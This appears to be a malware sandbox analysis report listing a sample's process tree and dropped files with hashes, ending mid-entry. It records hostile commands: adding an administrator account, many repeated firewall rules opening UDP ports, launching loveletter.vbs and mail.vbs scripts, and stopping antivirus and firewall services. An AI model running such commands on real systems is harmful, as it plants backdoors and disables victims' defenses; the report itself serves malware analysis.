- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exenet localgroup administrators session /ADD3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD4⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\loveletter.vbs"2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\mail.vbs"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Get-Content -Path C:\Users\Admin\Desktop\YcynNote.txt | Out-Printer"2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Get-Content -Path C:\Users\Admin\Desktop\YcynNote.txt | Out-Printer"2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Ahnlab Task Scheduler" /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop navapsvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "*Symantec*" /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop InoRPC /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc1⤵
-
C:\Windows\system32\printfilterpipelinesvc.exeC:\Windows\system32\printfilterpipelinesvc.exe -Embedding1⤵
-
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d136d3411d4aa688242c53cafb993aa6
SHA11a81cc78e3ca445d5a5193e49ddce26d5e25179f
SHA25600ae5433c0107cc164516c7849b4cff7b6faeb52e5afa65c01dbd8c7a5efe397
SHA512282ea53f8093c00e8c64d253782068211f8c4187391d5078755f55dedb8825c0042173d82f489d7b6c06e88184b70e83c1e92dadb80f57bd96c95855ac6b3da1
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD51dffbab5ecc6d06e8b259ad505a0dc2a
SHA10938ec61e4af55d7ee9d12708fdc55c72ccb090c
SHA256a9d2e6d35c5e9b94326042c6f2fe7ef381f25a0c02b8a559fc1ee888ccffb18e
SHA51293209a16400574416f6f992c2d403acc399179fc911818c4967c9a0211924486878578d1c98ba3bc9e269012603c96ab118a291bf53c57d8af9ab48f9e7b9b76
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD5243108f8a57b9ea5e8449f382d21605e
SHA1d2f0009ce295e6db9f6e57eb7e224a50f54710b4
SHA2562709a3a45d831104e0c438e038954aa7f9a69c9ee7fb41d0945b3c2c3e03de94
SHA512d9bfeb1f37d9c2f758e6c9e68cfa381023fe09c475e49b40cbfc5ef6b7486dc30a9888f4d50c410382633550a1292346dc2edd6c703688b499d2f1f09a517cf8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD5243108f8a57b9ea5e8449f382d21605e
SHA1d2f0009ce295e6db9f6e57eb7e224a50f54710b4
SHA2562709a3a45d831104e0c438e038954aa7f9a69c9ee7fb41d0945b3c2c3e03de94
SHA512d9bfeb1f37d9c2f758e6c9e68cfa381023fe09c475e49b40cbfc5ef6b7486dc30a9888f4d50c410382633550a1292346dc2edd6c703688b499d2f1f09a517cf8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD5243108f8a57b9ea5e8449f382d21605e
SHA1d2f0009ce295e6db9f6e57eb7e224a50f54710b4
SHA2562709a3a45d831104e0c438e038954aa7f9a69c9ee7fb41d0945b3c2c3e03de94
SHA512d9bfeb1f37d9c2f758e6c9e68cfa381023fe09c475e49b40cbfc5ef6b7486dc30a9888f4d50c410382633550a1292346dc2edd6c703688b499d2f1f09a517cf8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD5446dd1cf97eaba21cf14d03aebc79f27
SHA136e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD51dffbab5ecc6d06e8b259ad505a0dc2a
SHA10938ec61e4af55d7ee9d12708fdc55c72ccb090c
SHA256a9d2e6d35c5e9b94326042c6f2fe7ef381f25a0c02b8a559fc1ee888ccffb18e
SHA51293209a16400574416f6f992c2d403acc399179fc911818c4967c9a0211924486878578d1c98ba3bc9e269012603c96ab118a291bf53c57d8af9ab48f9e7b9b76
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD524c13d5530c176b565619683e21ea2e7
SHA1d65f5d8481f8b2f53ee1295f8fb06c9170914171
SHA2567282f4459a68e55266453fc018a89377d3420baa44977f528b66eee029df84d6
SHA51212e079e0fbab640904e9dbf746785a7824656186c26930ece5d9fb1894935feb691705145e3b3d2480a84bab2a6b99a14c735d146a747074015477c5091ffb41
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD524c13d5530c176b565619683e21ea2e7
SHA1d65f5d8481f8b2f53ee1295f8fb06c9170914171
SHA2567282f4459a68e55266453fc018a89377d3420baa44977f528b66eee029df84d6
SHA51212e079e0fbab640904e9dbf746785a7824656186c26930ece5d9fb1894935feb691705145e3b3d2480a84bab2a6b99a14c735d146a747074015477c5091ffb41
-
C:\Users\Admin\Desktop\YcynNote.txtFilesize
468B
MD59ab62c7b89f1dd33303a86d6f6d0f3c5
SHA1da827e4c4ff38e11bf5bdb76ff5fcfe45cb1a22b
SHA2563ad1a2d04f1410c2aeeedef71b60453d6bbe7ed2bada635ccc03dd673e073973
SHA512336b14e6d1c4b27a0d4fc6a3cb76bbfa271cef0f46f12515e18d3ed1388f9604f0ae7c0aa59220c150a3afca975cf794cf767dff6632cc8f89f161bdd64ef07a
-
C:\Users\Admin\Documents\black.batFilesize
71B
MD53544e4b7ac1418d34061648a9f3e3dc6
SHA130e88f4aa1cc6c936c9c274f9f4f53b491a4d8ce
SHA256db24f2b49b88e4cf7c3569a067f3e6e325d54a3be2368262d37a6a34f4f8aae8
SHA5125d3048b421b4900efdce377d61f8965beb4bc02db27875c03eb378cd9996de9a01b63e54e99b4f94e4cf14e1b60d873d715ccea38fd0bdc1200ad3a2f268e126
-
C:\Users\Admin\Downloads\2b2crypt.cmdFilesize
133B
MD59ba1673c3091ad1451841bddf6854bf7
SHA15cc13d5f009f2d4b9799100263625f8b3e0fa975
SHA25637ad62436a4260aa4922a7103b1ebfae545c4be2a7ce86118d2a9514ac99d635
SHA512f8ce53384d410b6e0b9b47ab9a4d211f467da4f5d10afa268e4b0d63f298b3b92a324a0529eb8a3ffc6be179890b8f41321be85eae92944464c7dc338442cab1
-
C:\Users\Admin\Downloads\2b2crypt.m.cmdFilesize
139B
MD5269ebb3dc0e208d9dd2cb151a3655c2f
SHA14bde16bcc0ce8a4e47b616027299ee779a84a278
SHA256d2ef0748142bf6eff23944377539846456b2fa45de9517bdd92de2e16f8c4b5f
SHA51275727a0cd8fd3c6343fd56a0de7f44d165e0f4814076d3b183984803b05f0ceed48e0d3d79a622225a747ca7df62d490d35d5aeca9e346c43c1d6c3704af6348
-
C:\Users\Admin\FuckPorts.cmdFilesize
358B
MD507d68bb7aa6915adb05617fe1e37f36c
SHA10eea2f3c506e696c35c15b7e507f886d8e87676f
SHA256134731595d0f89d5332dfeaf8e2d10fcfa1cc381d1d0691ab5f04259e4210c0e
SHA512efb91001b8313d54a6e5afd6fdef9935e0412ff69692e410747f16d67c33ec74859221a2a37a3250edf3ff59b1efc569e589ba4158efc9df2e2bc2e13c26476d
-
C:\Users\Admin\GetToken.exeFilesize
8KB
MD52ed86e80ea9b4b95b3e52ed77ea6c401
SHA15032e67b7c84362374b7d52507ab83ae03d7ebff
SHA2566ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983
SHA51264fa72aea094f6aa03d9f6dcee3f72ce156a5a7802c39c59af5fc637e72303d46740f0c022fbd4c9f1ec62300ee33cc0af2ac0622729ae67717f580e007e6e71
-
C:\Users\Admin\GetToken.exeFilesize
8KB
MD52ed86e80ea9b4b95b3e52ed77ea6c401
SHA15032e67b7c84362374b7d52507ab83ae03d7ebff
SHA2566ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983
SHA51264fa72aea094f6aa03d9f6dcee3f72ce156a5a7802c39c59af5fc637e72303d46740f0c022fbd4c9f1ec62300ee33cc0af2ac0622729ae67717f580e007e6e71
-
C:\Users\Admin\IP.txtFilesize
13B
MD550abaeee4fb79aeecc85d5072a758941
SHA1eb60d1eb86b253850fbaf54eb967e2add6ce4929
SHA256c53f2af0fca176a3644dbba8f22dc0a8784d9a656d78d8aa5d6c6076145f23fe
SHA51235ba400f4b8efac46a8d2347e2cae74364b62e1adc43ee3c4b1c3be441b88331da8ceb2e8d976fa3bde4b150717340227ba16c2c42ee716946dde3f33b6fa78e
-
C:\Users\Admin\Tokens.txtFilesize
22B
MD53d74b4a3f6053a5a252f4faee7fb157e
SHA1576c1a2892dad89c3b6aba698ee67258be827eaf
SHA256445f09c32e44ec144320d929de814ceda449da7efa062a19c1cc78cde29fb139
SHA512dab16b5c564af14fb632f086b99530061d86f54cffed6bfa1b9ae59f97b77beec8ae89c132e2a217d555df512c75bb236921014ac0ff8053c88af16a96db7529
-
C:\Users\Admin\apps.txtFilesize
8KB
MD56bf4cd4f0d7fe6d03030441cc05d10bc
SHA1cc7017ae89ccd9881675d1374520c73ebfc09ca4
SHA256d96b64543b6a19c6a9e660950d348f1690486ef2a68879f1694cac46158cb106
